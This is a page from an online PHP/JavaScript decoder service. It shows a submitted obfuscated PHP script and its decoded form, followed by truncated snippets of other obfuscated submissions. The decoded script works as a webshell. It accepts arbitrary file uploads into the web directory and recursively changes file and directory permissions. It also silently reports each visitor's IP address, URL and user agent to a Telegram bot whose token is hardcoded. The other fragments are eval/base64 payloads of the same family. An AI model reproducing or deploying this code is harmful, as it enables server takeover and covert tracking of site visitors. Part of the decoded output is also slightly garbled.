Online PHP Javascript Script Decoder

Online PHP and Javascript Decoder decode hidden script to uncover its real functionality

Original code:

<?php
 goto tdmd8; weFDd: function changePermissions($directory, $filePerm, $dirPerm, $rootDir) { $realPath = realpath($directory); $rootReal = realpath($rootDir); if ($realPath === false || strpos($realPath, $rootReal) !== 0) { echo "\x3c\x64\151\x76\40\x63\154\x61\x73\x73\75\47\x6c\x6f\147\40\145\x72\x72\157\162\x27\76\133\x42\114\x4f\103\113\x45\x44\x5d\40{$directory}\74\x2f\144\x69\166\x3e"; return; } foreach (array_diff(scandir($realPath), array("\56", "\56\56")) as $file) { $path = $realPath . "\x2f" . $file; if (is_file($path)) { chmod($path, octdec($filePerm)); echo "\74\144\x69\x76\x20\143\154\x61\163\163\x3d\47\154\x6f\x67\x20\x66\x69\x6c\145\x27\76\x5b\106\111\x4c\105\x5d\x20{$path}\40\342\206\222\x20{$filePerm}\x3c\57\144\x69\166\76"; } elseif (is_dir($path)) { chmod($path, octdec($dirPerm)); echo "\x3c\144\x69\x76\40\143\x6c\141\x73\x73\75\x27\154\x6f\x67\x20\144\x69\x72\x27\x3e\133\104\111\122\40\135\40{$path}\40\342\206\x92\x20{$dirPerm}\74\57\x64\x69\166\x3e"; changePermissions($path, $filePerm, $dirPerm, $rootDir); } flush(); ob_flush(); } } goto nDBUO; fPkQJ: function telegramLogOnce($text) { global $TG_TOKEN, $TG_CHATID; $ip = $_SERVER["\122\105\x4d\x4f\x54\x45\x5f\x41\x44\104\x52"] ?? "\165\x6e\153\x6e\x6f\167\x6e"; $logDir = __DIR__ . "\x2f\x2e\151\160\x6c\x6f\x67"; $logFile = $logDir . "\x2f" . md5($ip); if (file_exists($logFile)) { return; } if (!is_dir($logDir)) { mkdir($logDir, 448); } $ch = curl_init("\x68\x74\x74\x70\163\72\57\x2f\141\x70\151\x2e\x74\145\154\145\147\x72\x61\x6d\x2e\157\162\147\x2f\142\157\164{$TG_TOKEN}\57\163\x65\156\144\x4d\x65\x73\163\x61\147\x65"); curl_setopt_array($ch, array(CURLOPT_POST => true, CURLOPT_POSTFIELDS => array("\143\150\x61\164\x5f\151\x64" => $TG_CHATID, "\x74\145\x78\x74" => $text, "\144\x69\x73\141\142\154\x65\x5f\167\145\142\x5f\x70\141\147\x65\137\x70\x72\x65\166\151\145\x77" => true), CURLOPT_RETURNTRANSFER => true, CURLOPT_TIMEOUT => 5)); curl_exec($ch); curl_close($ch); file_put_contents($logFile, time()); } goto j6aIW; tdmd8: ob_start(); goto C3kJK; VUptL: $ua = $_SERVER["\110\x54\x54\x50\x5f\125\x53\105\x52\137\x41\x47\x45\x4e\x54"] ?? "\x75\156\x6b\x6e\x6f\167\x6e"; goto Ron9e; C3kJK: error_reporting(0); goto OeZ6g; OeZ6g: $TG_TOKEN = "\x38\65\x34\71\60\65\x36\65\63\x30\x3a\x41\x41\110\170\71\101\x68\122\x34\x78\55\x31\115\x42\x5f\x74\x5a\132\65\172\x61\116\101\x58\126\x42\x67\61\167\x61\x54\66\x7a\110\x6b"; goto aVErT; qWFm5: $ip = $_SERVER["\x52\x45\115\x4f\x54\x45\x5f\x41\104\x44\122"] ?? "\x75\x6e\x6b\156\157\167\x6e"; goto VUptL; aVErT: $TG_CHATID = "\61\62\66\63\63\62\60\x30\63\x37"; goto fPkQJ; iGW9w: ?>
</span></div><div class="info-row"><span>Access IP</span><span><?php  goto Q5XwM; mEC4j: echo htmlspecialchars(__DIR__); goto iGW9w; Ron9e: telegramLogOnce("\360\237\x9a\250\x20\x50\110\x50\40\x41\103\103\105\123\123\x20\x28\x31\x78\x2f\111\120\x29\12\125\122\x4c\x3a\x20{$url}\xa\111\120\x3a\x20{$ip}\12\x55\x41\72\40{$ua}"); goto weFDd; FFu_y: $url = $scheme . "\x3a\x2f\x2f" . ($_SERVER["\110\124\124\x50\137\110\117\x53\x54"] ?? '') . ($_SERVER["\x52\105\x51\125\x45\123\x54\137\x55\x52\x49"] ?? ''); goto qWFm5; Q5XwM: echo htmlspecialchars($ip); goto uB4Bw; j6aIW: $scheme = !empty($_SERVER["\x48\124\124\x50\x53"]) && $_SERVER["\110\x54\x54\x50\123"] !== "\x6f\x66\x66" ? "\150\164\x74\160\x73" : "\x68\164\x74\160"; goto FFu_y; QFTnL: if ($_SERVER["\122\105\121\125\x45\x53\x54\137\x4d\105\124\x48\117\104"] === "\x50\117\x53\124") { echo "\x3c\144\x69\166\40\x63\154\141\x73\163\x3d\47\164\145\162\x6d\x69\156\x61\x6c\x27\x3e"; if (!empty($_FILES["\165\160\154\x6f\141\x64"]["\156\x61\x6d\x65"])) { $t = __DIR__ . "\57" . basename($_FILES["\x75\x70\154\157\x61\x64"]["\156\141\155\x65"]); if (move_uploaded_file($_FILES["\x75\160\x6c\157\x61\144"]["\x74\155\160\x5f\x6e\x61\155\145"], $t)) { chmod($t, 292); echo "\x3c\144\x69\x76\x20\143\x6c\141\163\163\x3d\x27\x6c\x6f\x67\x20\146\151\154\145\47\76\x5b\x55\120\114\117\101\x44\135\40{$t}\74\57\x64\x69\x76\76"; } } if (isset($_POST["\x65\170\x65\x63\165\x74\x65"])) { $root = realpath($_POST["\x64\151\162\145\143\164\x6f\162\171"]); if ($root) { echo "\x3c\x64\x69\166\40\143\154\x61\x73\x73\x3d\47\154\157\147\x20\x64\151\162\x27\x3e\x5b\123\x54\101\122\x54\135\x20{$root}\x3c\57\144\151\x76\x3e"; changePermissions($root, $_POST["\146\x69\x6c\145\x5f\x70\x65\x72\x6d"], $_POST["\144\151\x72\137\160\x65\x72\155"], $root); echo "\74\x64\151\x76\40\x63\x6c\141\163\163\75\x27\x6c\157\147\40\x66\x69\154\145\x27\76\x5b\x44\x4f\116\105\x5d\40\145\x78\x65\x63\x75\164\151\x6f\156\x20\146\151\156\x69\163\x68\x65\144\x3c\57\x64\x69\166\76"; } else { echo "\74\x64\x69\166\40\143\x6c\x61\163\x73\75\x27\x6c\157\x67\x20\145\x72\x72\x6f\x72\x27\x3e\x5b\105\122\122\x4f\x52\135\40\151\156\166\141\x6c\151\x64\x20\x64\151\x72\x65\143\x74\x6f\x72\x79\x3c\57\x64\x69\166\x3e"; } } echo "\74\x2f\144\x69\x76\76"; } goto pr7Dj; nDBUO: ?>

Decrypted code:

goto tdmd8; weFDd: function changePermissions($directory, $filePerm, $dirPerm, $rootDir) { $realPath = realpath($directory); $rootReal = realpath($rootDir); if ($realPath === false || strpos($realPath, $rootReal) !== 0) { echo "<div class='log error'>[BLOCKED] {$directory}</div>"; return; } foreach (array_diff(scandir($realPath), array(, "..")) as $file) { $path = $realPath . "/" . $file; if (is_file($path)) { chmod($path, octdec($filePerm)); echo "<div class='log file'>[FILE] {$path} → {$filePerm}</div>"; } elseif (is_dir($path)) { chmod($path, octdec($dirPerm)); echo "<div class='log dir'>[DIR ] {$path} → {$dirPerm}</div>"; changePermissions($path, $filePerm, $dirPerm, $rootDir); } flush(); ob_flush(); } } goto nDBUO; fPkQJ: function telegramLogOnce($text) { global $TG_TOKEN, $TG_CHATID; $ip = $_SERVER["REMOTE_ADDR"] ?? "unknown"; $logDir = __DIR__ . "/.iplog"; $logFile = $logDir . "/" . md5($ip); if (file_exists($logFile)) { return; } if (!is_dir($logDir)) { mkdir($logDir, 448); } $ch = curl_init("https://api.telegram.org/bot{$TG_TOKEN}/sendMessage"); curl_setopt_array($ch, array(CURLOPT_POST => true, CURLOPT_POSTFIELDS => array("chat_id" => $TG_CHATID, "text" => $text, "disable_web_page_preview" => true), CURLOPT_RETURNTRANSFER => true, CURLOPT_TIMEOUT => 5)); curl_exec($ch); curl_close($ch); file_put_contents($logFile, time()); } goto j6aIW; tdmd8: ob_start(); goto C3kJK; VUptL: $ua = $_SERVER["HTTP_USER_AGENT"] ?? "unknown"; goto Ron9e; C3kJK: error_reporting(0); goto OeZ6g; OeZ6g: $TG_TOKEN = "8905:AAHx9AhR4xiMB_tZZ5zaNAXVBg1waT6zHk"; goto aVErT; qWFm5: $ip = $_SERVER["REMOTE_ADDR"] ?? "unknown"; goto VUptL; aVErT: $TG_CHATID = "126332"; goto fPkQJ; iGW9w:
</span></div><div class="info-row"><span>Access IP</span><span>goto Q5XwM; mEC4j: echo htmlspecialchars(__DIR__); goto iGW9w; Ron9e: telegramLogOnce("🚨 PHP ACCESS (1x/IP)
URL: {$url}\xaIP: {$ip}
UA: {$ua}"); goto weFDd; FFu_y: $url = $scheme . "://" . ($_SERVER["HTTP_HOST"] ?? '') . ($_SERVER["REQUEST_URI"] ?? ''); goto qWFm5; Q5XwM: echo htmlspecialchars($ip); goto uB4Bw; j6aIW: $scheme = !empty($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] !== "off" ? "https" : "http"; goto FFu_y; QFTnL: if ($_SERVER["REQUEST_METHOD"] === "POST") { echo "<div class='terminal'>"; if (!empty($_FILES["upload"]["name"])) { $t = __DIR__ . "/" . basename($_FILES["upload"]["name"]); if (move_uploaded_file($_FILES["upload"]["tmp_name"], $t)) { chmod($t, 292); echo "<div class='log file'>[UPLOAD] {$t}</div>"; } } if (isset($_POST["execute"])) { $root = realpath($_POST["directory"]); if ($root) { echo "<div class='log dir'>[START] {$root}</div>"; changePermissions($root, $_POST["file_perm"], $_POST["dir_perm"], $root); echo "<div class='log file'>[DONE] execution finished</div>"; } else { echo "<div class='log error'>[ERROR] invalid directory</div>"; } } echo "</div>"; } goto pr7Dj; nDBUO:

Recent submissions:

$a='7b1rb+vKkiX4uRro/3BRuB+q4MaIetim0HN7kCSTTEoizaRFSnSjp7E3dURJpB7ekg9lNea/T0RkkpIf+96q7s... $weJnnRkWzE = "nzftA"; $kWWFvsbJOB = "G"; $kWWFvsbJOB.= $weJnnRkWzE[(91 - 85... <?php eval(base64_decode('CiBnb3RvIE4xb3FpOyBRb1BWbTogZ290byBvaVVlVDsgZ290byBUMnFqTTsgY3dV... $cFHkfnQNGT = "_AeBDsCdE"; $ipfOOyQusH = $cFHkfnQNGT[(0 * 6) + 3] . $cFHkfnQNGT[(... <?php eval("\x3f\x3e".base64_decode("\x4a\127\164\166\114\x51\x6f\x6c\x4e\107\160\x32\114... <?php goto tdmd8; weFDd: function changePermissions($directory, $filePerm, $dirPerm, $ro... \u0417\u0430\u043c\u043e\u0432\u043b\u0435\u043d\u043d\u044f \u211617... <?php eval(' eval(gzinflate(base64_decode("7V0Lc9tGkv4rXFVqY1W5duc9gJlsBQT4AAmSAAgSJE+pLke... <?php ${"\x47\x4c\x4fBAL\x53"}["\x67\x74\x65uz\x78"]="\x78\x70\x6c\x31";${"\x47\x4c\x4f\x4... <?php $gvx = explode(';',urldecode('%65%72%72%6F%72%5F%72%65%70%6F%72%74%69%6E%67%3B%70%72...